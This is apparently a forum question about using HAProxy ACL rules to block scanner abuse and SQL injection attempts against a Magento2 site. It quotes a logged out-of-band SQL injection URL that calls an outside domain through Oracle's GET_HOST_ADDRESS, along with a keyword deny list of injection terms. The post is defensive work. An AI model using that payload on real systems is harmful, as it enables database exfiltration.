# Advanced abuse detection

Tags: haproxy

we are facing some netsparker scans and other abuse related things on a Magento2 installation. We already implemented rate limiting with sticky tables.

In the next step we want to acl deny specific urls.

An example

> https://www.exampledomain.com/category/page.html?hTTp%3A%2F%2Fr87_com%2Fn=&attribute=(select%20UTL_INADDR.GET_HOST_ADDRESS(%27i-bwzqt8sjg7sqtf9ygenxljxxmu2ad0itrghi_9%27%7c%7c%27k34.r87.me%27)%20from%20DUAL)

We tried to setup some regex like

```
frontend https

bind *:443 ssl crt... 

    #SQL injection prevention
    #acl URI_DENY url_reg -i .*(WAITFOR|WHERE|DELAY|DECLARE|SLEEP|NSFTW|DUAL)
    #acl URI_DENY url_reg -i .*(SELECT)
    #acl URI_DENY url_reg -i .*(convert|exec|bexec|procedure|dblink|r87.com|xp_dirtree|pg_sleep|dbms_pipe)
    #acl URI_DENY url_reg -i .*(CTXSYS.DRITHSX.SN|GET_HOST_ADDRESS)
    #http-request tarpit if URI_DENY
```

which result in application frontend errors.

How can we handle this more efficient?

Comment: show your configuration file, not only two lines

Comment: Hey! Could you please provide additional details or be more specific regarding your question? This would really help our contributors answer your question as best as possible.

Comment: I added some relevant stuff... I think it doesn't make sense to post the complete config stuff